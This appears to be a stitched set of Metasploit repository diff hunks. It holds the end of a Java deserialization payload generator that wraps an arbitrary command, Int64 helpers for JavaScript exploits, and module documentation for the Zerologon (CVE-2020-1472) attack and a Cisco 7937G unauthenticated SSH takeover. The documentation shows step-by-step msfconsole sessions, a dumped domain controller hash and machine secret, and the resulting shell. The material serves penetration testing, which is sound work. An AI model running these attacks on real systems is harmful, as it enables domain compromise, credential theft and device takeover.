+        if(args.length != 2){
+            System.out.println("java -jar payload.jar outfile cmd");
+            System.exit(0);
+        }
+
+        String cmd = args[1];
+        FileOutputStream out = new FileOutputStream(args[0]);
+
+        Payload pwn = new Payload(cmd);
+        ObjectOutputStream oos = new ObjectOutputStream(out);
+        oos.writeObject(pwn);
+        oos.flush();
+        out.flush();
+
+
+    }
+
+}
@@ -79,17 +79,41 @@ function Int64(v) {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

-    this.lo = function()
-    {
+    this.lo = function() {
        var b = this.bytes();
        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
    };

-    this.hi = function()
-    {
+    this.hi = function() {
        var b = this.bytes();
        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
    };
+    
+    this.asInt32 = function() {
+        var value = new Int64(0);
+        for (var i = 0; i < 8; i++) {
+            if (i < 4) {
+                value.bytes[i] = this.bytes[i];
+            } else {
+                value.bytes[i] = 0;
+            }
+        }
+        
+        return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
+    };
+    
+    this.asInt16 = function() {
+        var value = new Int64(0);
+        for (var i = 0; i < 8; i++) {
+            if (i < 2) {
+                value.bytes[i] = this.bytes[i];
+            } else {
+                value.bytes[i] = 0;
+            }
+        }
+        
+        return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
+    };

    // Basic arithmetic.
    // These functions assign the result of the computation to their 'this' object.
@@ -138,20 +162,44 @@ function Int64(v) {
    }, 2);

    // this = a ^ b
-    this.assignXor = operation(function sub(a, b) {
+    this.assignXor = operation(function xor(a, b) {
        for (var i = 0; i < 8; i++) {
            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
        }
        return this;
    }, 2);
-
+    
    // this = a & b
-    this.assignAnd = operation(function sub(a, b) {
+    this.assignAnd = operation(function and(a, b) {
        for (var i = 0; i < 8; i++) {
            bytes[i] = a.byteAt(i) & b.byteAt(i);
        }
        return this;
-    }, 2)
+    }, 2);
+    
+    // this = a << b
+    this.assignShiftLeft = operation(function shiftLeft(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < b) {
+                bytes[i] = 0;
+            } else {
+                bytes[i] = a.byteAt(Sub(i, b).asInt32());
+            }
+        }
+        return this;
+    }, 2);
+    
+    // this = a >> b
+    this.assignShiftRight = operation(function shiftRight(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < (8 - b)) {
+                bytes[i] = a.byteAt(Add(i, b).asInt32());
+            } else {
+                bytes[i] = 0;
+            }
+        }
+        return this;
+    }, 2);
 }

 // Constructs a new Int64 instance with the same bit representation as the provided double.
@@ -187,6 +235,16 @@ function And(a, b) {
    return (new Int64()).assignAnd(a, b);
 }

+// Return a << b
+function ShiftLeft(a, b) {
+    return (new Int64()).assignShiftLeft(a, b);
+}
+
+// Return a >> b
+function ShiftRight(a, b) {
+    return (new Int64()).assignShiftRight(a, b);
+}
+
 // Some commonly used numbers.
 Int64.Zero = new Int64(0);
 Int64.One = new Int64(1);
@@ -64,8 +64,6 @@ function b2u32(b)
    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
 }

-
-
 function off2addr(segs, off)
 {
    if(!(off instanceof Int64)) off = new Int64(off);
@@ -138,47 +136,11 @@ function fsyms(mem, base, segs, want, syms)
    return syms;
 }

-function strcmp(b, str)
-{
-    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
-    for(var i = 0; i < str.length; ++i)
-    {
-        if(fn(i) != str.charCodeAt(i))
-        {
-            return false;
-        }
-    }
-    return fn(str.length) == 0;
-}
-
 function _u32(i)
 {
    return b2u32(this.read(i, 4));
 }

-function _read(i, l)
-{
-    if (i instanceof Int64) i = i.lo();
-    if (l instanceof Int64) l = l.lo();
-    if (i + l > this.length)
-    {
-        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
-    }
-    return this.slice(i, i + l);
-}
-
-function _readInt64(addr)
-{
-    return new Int64(this.read(addr, 8));
-}
-
-function _writeInt64(i, val)
-{
-    if (i instanceof Int64) i = i.lo();
-    this.set(val.bytes(), i);
-}
-
-
 // Simplified version of the similarly named python module.
 var Struct = (function() {
    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,173 @@
+## Vulnerable Application
+A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost
+due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this
+flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields
+which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account
+password to an empty string, which will then allow the attacker to authenticate as the machine account. After
+exploitation, it's important to restore this password to it's original value. Failure to do so can result in service
+instability.
+
+The `auxiliary/gather/windows_secrets_dump` module can be used to recover the original machine account password which
+can then be restored with this module by using the `RESTORE` action and setting the `PASSWORD` value.
+
+## Verification Steps
+
+1. Exploit the vulnerability to remove the machine account password by replacing it with an empty string
+    1. From msfconsole
+    1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
+    1. Set the `RHOSTS` and `NBNAME` values
+    1. Run the module and see that the original machine account password was removed
+1. Recover the original machine account password
+    1. Do: `use auxiliary/gather/windows_secrets_dump`
+    1. Set the `RHOSTS` values
+    1. Set the `SMBUser` option to the NetBIOS name with a trailing `$`, e.g. `NBNAME$`
+    1. Set the `SMBPass` option to `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` (the hash of an empty password)
+    1. Run the module and search for the password in the output (`NBNAME$:plain_password_hex:`)
+1. Restore the original machine account password
+    1. From msfconsole
+    1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
+    1. Set the action to `RESTORE`
+    1. Set the `RHOSTS`, `NBNAME` and `PASSWORD` values
+    1. Run the module and see that the original value was restored
+
+## Options
+
+### NBNAME
+
+The NetBIOS name of the target domain controller. You can use the `auxiliary/scanner/netbios/nbname` module to obtain
+this value. If this value is invalid the module will fail when making a Netlogon RPC request.
+
+### PASSWORD
+
+The hex value of the original machine account password. This value is typically recovered from the target system's
+registry (such as by using the `auxiliary/gather/windows_secrets_dump` Metasploit module) after successfully setting the
+value to an empty string within Active Directory using this module and the default `REMOVE` action.
+
+This value is only used when running the module with the `RESTORE` action.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, exploit the vulnerability to remove the machine account password by replacing it with an empty string.
+
+```
+msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.159.53 
+RHOSTS => 192.168.159.53
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME WIN-GD5KVDKUNIP
+NBNAME => WIN-GD5KVDKUNIP
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 
+
+Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   NBNAME  WIN-GD5KVDKUNIP  yes       The server's NetBIOS name
+   RHOSTS  192.168.159.53   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                    no        The netlogon RPC port (TCP)
+
+
+Auxiliary action:
+
+   Name    Description
+   ----    -----------
+   REMOVE  Remove the machine account password
+
+
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
+[*] Running module against 192.168.159.53
+
+[*] 192.168.159.53: - Connecting to the endpoint mapper service...
+[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[+] 192.168.159.53:6403 - Successfully authenticated
+[+] 192.168.159.53:6403 - Successfully set the machine account (WIN-GD5KVDKUNIP$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
+```
+
+At this point the `exploit/windows/smb/psexec` module can be used to achieve code execution if desired. Set the `SMBUser` option to the
+machine account and the `SMBPass` option to the empty password value.
+
+Next, recover the original machine account password value using `auxiliary/gather/windows_secrets_dump`. Look for the `plain_password_hex`
+value in the `$MACHINE.ACC` section.
+
+```
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > use auxiliary/gather/windows_secrets_dump 
+msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.53
+RHOSTS => 192.168.159.53
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser WIN-GD5KVDKUNIP$
+SMBUser => WIN-GD5KVDKUNIP$
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
+SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
+msf6 auxiliary(gather/windows_secrets_dump) > run
+[*] Running module against 192.168.159.53
+
+[*] 192.168.159.53:445 - Service RemoteRegistry is already running
+[*] 192.168.159.53:445 - Retrieving target system bootKey
+[+] 192.168.159.53:445 - bootKey: 0xa11f7c33c8bab9e427dec59436dbb17d
+[*] 192.168.159.53:445 - Saving remote SAM database
+[*] 192.168.159.53:445 - Dumping SAM hashes
+[*] 192.168.159.53:445 - Password hints:
+No users with password hints on this system
+[*] 192.168.159.53:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:6df12cddaa88057f06a80b5ee73b949b:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
+[*] 192.168.159.53:445 - Saving remote SECURITY database
+[*] 192.168.159.53:445 - Decrypting LSA Key
+[*] 192.168.159.53:445 - Dumping LSA Secrets
+$MACHINE.ACC
+EXCHG\WIN-GD5KVDKUNIP$:plain_password_hex:4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+EXCHG\WIN-GD5KVDKUNIP$:aes256-cts-hmac-sha1-96:127c328739d4406e6734684b971709acb2215f947b961355fa25b9b3fda38a08
+EXCHG\WIN-GD5KVDKUNIP$:aes128-cts-hmac-sha1-96:becbe21ab050ccb1d8a5b908839fd95f
+EXCHG\WIN-GD5KVDKUNIP$:des-cbc-md5:b5f843cec2e56220
+EXCHG\WIN-GD5KVDKUNIP$:aad3b435b51404eeaad3b435b51404ee:ec3a7fa2158f1f705898d538ad3aafaf:::
+...
+
+[*] 192.168.159.53:445 - Decrypting NL$KM
+[*] 192.168.159.53:445 - Dumping cached hashes
+No cached hashes on this system
+[*] 192.168.159.53:445 - Cleaning up...
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/windows_secrets_dump) >
+```
+
+Finally, restore the original value using this module.
+
+```
+msf6 auxiliary(gather/windows_secrets_dump) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon 
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE 
+ACTION => RESTORE
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+PASSWORD => 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 
+
+Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
+
+   Name      Current Setting                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Required  Description
+   ----      ---------------                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   --------  -----------
+   NBNAME    WIN-GD5KVDKUNIP                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   yes       The server's NetBIOS name
+   PASSWORD  4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d  no        The password to restore for the machine account (in hex)
+   RHOSTS    192.168.159.53                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       no        The netlogon RPC port (TCP)
+
+
+Auxiliary action:
+
+   Name     Description
+   ----     -----------
+   RESTORE  Restore the machine account password
+
+
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
+[*] Running module against 192.168.159.53
+
+[*] 192.168.159.53: - Connecting to the endpoint mapper service...
+[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[+] 192.168.159.53:6403 - Successfully set machine account (WIN-GD5KVDKUNIP$) password
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
+```
@@ -0,0 +1,450 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a feature that should not be available via the web interface.
+  An unauthenticated user may set the credentials for SSH access to any username and
+  password combination desired, giving access to administrative functions through an SSH connection.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access and SSH Access on the device.
+  3. Start msfconsole
+  4. Do: `use auxiliary/admin/http/cisco_7937g_ssh_privesc`
+  5. Do: `set RHOSTS 192.168.1.10`
+  6. Do: `set USER test`
+  7. Do: `set PASS test`
+  8. Do: `run`
+  9. The conference station's SSH service should now be configured with the supplied USER:PASS.
+
+## Options
+
+### PASS
+
+The desired password for setting SSH access
+
+### USER
+
+The desired username for setting SSH access
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+#### Successful Scenario
+
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+test@192.168.110.209's password:
+
+$>help
+
+
+Commands 1 to 21:
+help - Shows basic help for all commands.
+echo - Echoes all arguments (arbitrary parameters, up to 9)
+psosMaxShow - Show max number of psos objects created.
+psosFailuresShow - Show failures of psos api calls.
+clearNetStats - Clear statistics counters in Ethernet Driver.
+nicheShow - Show statistics of InterNiche stack.
+psosIntStackShow - Show information on interrupt stack.
+i - Display status of the specified process, or all running processes (Process_name (optional))
+checkStack - Checks the stack.
+reboot - Reboots the phone with an optional parameter.
+logl - Set the lowest log level which will be displayed (0-6)
+logs - Set the log level output for a given module ([module] [0-6])
+logsa - Set the log level output for all modules. ([0-6])
+logt - Set the log display type (0-2)
+logd - Dump the log, parameter is reverse order or not.
+logda - Print all available log modules and their current level.
+setRtRender - Set real time rendering parameters for the log.
+lfu - Send the logfiles to the provisioning server(no parameters).
+del - Delete specified file.
+cat - Concatanate specified files.
+
+Commands 21 to 41:
+copy - Copy a file, can be stdout.
+ls - List the contents of flash.
+ll - List the contents of flash.
+d - Display memory.  <address>,<num words>,<size words>
+m - Display memory.  <address>,<size words>
+ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
+ifShow - Display ethernet interface statistics (no parameters)
+showStoredConfig - Display configuration as stored in flash (no parameters)
+showRunningConfig - Display the current running configuration (no parameters)
+showBackupConfig - Display backup configuration as stored in flash (no parameters)
+overrideBackupConfig - Override backup flash config with current config (no parameters)
+overrideSecurityBackup - Override backup security sector with current security sector.
+resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
+configDhcpSet - Set DHCP parameters in the flash. 
+		(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, 
+		Using statically configured boot server[YES|NO])
+configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
+configNetSet - Set network parameters in the flash. 
+		(IP Address, Subnet Mask, Router, VLAN(can be empty))
+configProvisioningSet - Set provisioning server parameters in the flash. 
+		(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
+configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
+nslookup - Find the IP for a given hostname
+dnsCacheAShow - Show DNS Cache for A records.
+
+Commands 41 to 61:
+dnsCacheSrvShow - Show DNS Cache for SRV records.
+dnsCacheAFlush - Flush DNS A records from cache.
+version - Display vxWorks bootline, software versions, and hardware version.
+hwBoardSerialSet - Set serial number.  !!!!!Should never be used!!!!!.
+hwVarSet - Set the contents of a hardware var ([var ID] [new value])
+hwVarShow - Display the contents of a hardware var ([var ID])
+simulateKeyPress - Send a key Press event to so like it came from hardware.
+simulateKeyHold - Send a key Hold event to so like it came from hardware.
+simulateKeyRelease - Send a key Release event to so like it came from hardware.
+simulateHookUp - Send a hookswitch event to so like it came from hardware.
+simulateHookDown - Send a hookswitch event to so like it came from hardware.
+ncasMisc - Show misc. non-call information (no parameters)
+ncasCb - Show detailed ncas information, related to either call services,
+		non-call services, or server information (1, 2, or 3)
+uptime - Show phone uptime.
+appPrt - Show UI's call status.
+fntPrt - Show information about fonts available on phone.
+memtop - Shows the top poiter to current memory.
+removeScheduledLogEntry - debug
+addScheduledLogEntry - debug
+fatalError - Simulate fatal error for the phone.
+
+Commands 61 to 81:
+enableStrTruncLog - Enable logging of string truncation.
+disableStrTruncLog - Disable logging of string truncation.
+sendFlashBinImage - Upload binary flash image.
+setMac - debug, here because PSOS can't set the MAC.
+sg - send a bitmap to the boot server
+memShow - Display system memory usage
+memDebug - Toggle memory manager trace flag
+l2Debug - Toggle memory manager trace flag
+wsTest - Web Service Test Tool
+fxShow - Display file transfer manager status
+utilHostByNameShow - Test utilHostByName
+utilDnsShow - Show callbacks for dns queries
+dnsCacheShow - Show DNSACacheShow
+utilEthLinkShow - Show Ethernet link status
+ethConfigTest - Set Ethernet Mode (0 to 4)
+timeTest - Test time
+contrastChg - Change LCD Contrast
+setAdminVlan - Set admin vlan id
+setL2Auth - Set L2 Auth Enable/Disable
+ipAddrChange - Change ip addr configuration
+
+Commands 81 to 101:
+tftpChange - Change tftp addr
+arpStats - Print ARP statistics
+fxPut - Transfer file to remote
+crash - Crash the system
+ipAddrShow - Show ip addr
+rtosSocketShow - Show rtos socket information
+sccpShow - Show protocol
+regManagerShow - show registration manager state
+uiPrintAll - uiPrintAll
+uiPrintSoftKeys - uiPrintSoftKeys
+getVoiceQuality - displays voice quality control status
+uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
+uiStartTone - uiStartTone
+uiStopTone - uiStopTone
+pegPrintAll - pegPrintAll
+uiSMPrintAll - uiStateMachinePrintAll
+lldpSMPrintAll - lldpStateMachinePrintAll
+saveLogLevels - saveLogLevels
+localePrintAll - localePrintAll
+ceShow - Show Client Engine Status
+
+Commands 101 to 121:
+udiShow - Show Unique Device Indentifier
+show - Show Unique Device Indentifier
+pbnShow - Display app & bootrom headers
+upr - Upgrade to a Rockpile Standalone Image
+upm - Upgrade to a Rockpile Manf Image
+setHw - Sets the Rockpile Hardware Id
+getHw - Prints the Rockpile Hardware Id
+setUpf - Sets the Upgrade progress flag
+rstUpf - Resets the Upgrade progress flag
+setMdm - Sets the Manf diag mode flag
+rstMdm - Resets the Manf diag mode flag
+setDhcp - Sets the Manf diag dhcp flag
+rstDhcp - Resets the Manf diag  dhcp flag
+setOrd - Sets the ORD flag
+rstOrd - Resets the ORD flag
+fs - Prin the status of rockpile flags
+cp - Mfg. test diags
+vol - Mfg. test diags
+sig - Mfg. test diags
+os - Mfg. test diags
+
+Commands 121 to 141:
+lcd - Mfg. test diags
+sum - Prints checksums of flash images
+rd - Mfg. test diags
+wr - Mfg. test diags
+eth - Start/stop ethernet hardware
+fstp - Stop FGPIO interface
+hfTxEq - Audio testing for large conf rooms
+ctConv - perform ct convergence test.
+ctModeEnd - terminate ctMode
+ctEnableRx - Enable ctRx 1 on, 0 off
+ctEnableTx - Enable ctTx 1 on, 0 off
+ctMicTx - Route mic # to Tx
+ctEMTx - Route external mic # to Tx
+ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctRxSpkr - Send directly to HF speaker
+ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
+displayListeningPorts - Display listening port and process info 
+killListeningProcess - Kill the task associated with the port
+
+$>exit
+```
+
+#### Unsuccessful Scenario
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+#### Successful Scenario
+
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+test@192.168.110.209's password:
+
+$>help
+
+
+Commands 1 to 21:
+help - Shows basic help for all commands.
+echo - Echoes all arguments (arbitrary parameters, up to 9)
+psosMaxShow - Show max number of psos objects created.
+psosFailuresShow - Show failures of psos api calls.
+clearNetStats - Clear statistics counters in Ethernet Driver.
+nicheShow - Show statistics of InterNiche stack.
+psosIntStackShow - Show information on interrupt stack.
+i - Display status of the specified process, or all running processes (Process_name (optional))
+checkStack - Checks the stack.
+reboot - Reboots the phone with an optional parameter.
+logl - Set the lowest log level which will be displayed (0-6)
+logs - Set the log level output for a given module ([module] [0-6])
+logsa - Set the log level output for all modules. ([0-6])
+logt - Set the log display type (0-2)
+logd - Dump the log, parameter is reverse order or not.
+logda - Print all available log modules and their current level.
+setRtRender - Set real time rendering parameters for the log.
+lfu - Send the logfiles to the provisioning server(no parameters).
+del - Delete specified file.
+cat - Concatanate specified files.
+
+Commands 21 to 41:
+copy - Copy a file, can be stdout.
+ls - List the contents of flash.
+ll - List the contents of flash.
+d - Display memory.  <address>,<num words>,<size words>
+m - Display memory.  <address>,<size words>
+ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
+ifShow - Display ethernet interface statistics (no parameters)
+showStoredConfig - Display configuration as stored in flash (no parameters)
+showRunningConfig - Display the current running configuration (no parameters)
+showBackupConfig - Display backup configuration as stored in flash (no parameters)
+overrideBackupConfig - Override backup flash config with current config (no parameters)
+overrideSecurityBackup - Override backup security sector with current security sector.
+resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
+configDhcpSet - Set DHCP parameters in the flash. 
+		(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, 
+		Using statically configured boot server[YES|NO])
+configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
+configNetSet - Set network parameters in the flash. 
+		(IP Address, Subnet Mask, Router, VLAN(can be empty))
+configProvisioningSet - Set provisioning server parameters in the flash. 
+		(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
+configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
+nslookup - Find the IP for a given hostname
+dnsCacheAShow - Show DNS Cache for A records.
+
+Commands 41 to 61:
+dnsCacheSrvShow - Show DNS Cache for SRV records.
+dnsCacheAFlush - Flush DNS A records from cache.
+version - Display vxWorks bootline, software versions, and hardware version.
+hwBoardSerialSet - Set serial number.  !!!!!Should never be used!!!!!.
+hwVarSet - Set the contents of a hardware var ([var ID] [new value])
+hwVarShow - Display the contents of a hardware var ([var ID])
+simulateKeyPress - Send a key Press event to so like it came from hardware.
+simulateKeyHold - Send a key Hold event to so like it came from hardware.
+simulateKeyRelease - Send a key Release event to so like it came from hardware.
+simulateHookUp - Send a hookswitch event to so like it came from hardware.
+simulateHookDown - Send a hookswitch event to so like it came from hardware.
+ncasMisc - Show misc. non-call information (no parameters)
+ncasCb - Show detailed ncas information, related to either call services,
+		non-call services, or server information (1, 2, or 3)
+uptime - Show phone uptime.
+appPrt - Show UI's call status.
+fntPrt - Show information about fonts available on phone.
+memtop - Shows the top poiter to current memory.
+removeScheduledLogEntry - debug
+addScheduledLogEntry - debug
+fatalError - Simulate fatal error for the phone.
+
+Commands 61 to 81:
+enableStrTruncLog - Enable logging of string truncation.
+disableStrTruncLog - Disable logging of string truncation.
+sendFlashBinImage - Upload binary flash image.
+setMac - debug, here because PSOS can't set the MAC.
+sg - send a bitmap to the boot server
+memShow - Display system memory usage
+memDebug - Toggle memory manager trace flag
+l2Debug - Toggle memory manager trace flag
+wsTest - Web Service Test Tool
